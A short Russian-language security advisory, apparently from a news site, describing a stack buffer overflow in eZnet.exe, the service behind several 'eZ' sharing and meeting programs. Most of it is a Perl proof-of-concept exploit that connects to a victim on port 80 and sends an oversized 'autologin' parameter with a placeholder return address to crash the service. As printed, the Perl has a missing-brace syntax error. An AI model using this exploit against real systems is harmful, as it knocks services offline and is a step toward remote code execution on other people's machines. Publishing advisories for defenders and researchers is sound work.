Программа: eZ 'eZnet.exe' 

Уязвимость обнаружена в нескольких 'eZ' программах, включая eZphotoshare, eZmeeting, eZnetwork, и eZshare. Удаленный пользователь может выполнить произвольный код на целевой системе.
Удаленный пользователь может послать специально сформированный пакет к 80 TCP порту, чтобы врывать переполнение буфера в
eZnet.exe. Удаленный пользователь может аварийно завершить работу службы или выполнить произвольный код на целевой системе. 

Эксплоит: 

#!/usr/bin/perl -w

# Stack Overflow Vulnerability in eZphotoshare - PoC
# - by Peter Winter-Smith [peter4020@hotmail.com]

use IO::Socket;

if(!($ARGV[0]))

print "Usage: eZstack.pl <victim>\n\n";
exit;

print "Stack Overflow PoC\n";

$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>"80")
or die "Unable to connect to $ARGV[0] on port
80";

$eip = "\x58\x58\x58\x58";

$packet = "" .
"GET /SwEzModule.dll?operation=login&autologin=" .
"a"x4653 . $eip .
"\x20HTTP/1.0.User-Agent: SoftwaxAsys/2.1.10\n\n";

print $victim $packet;

print " + Making Request ...\n";

sleep(4);
close($victim);

print "Done.\n";
exit;

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии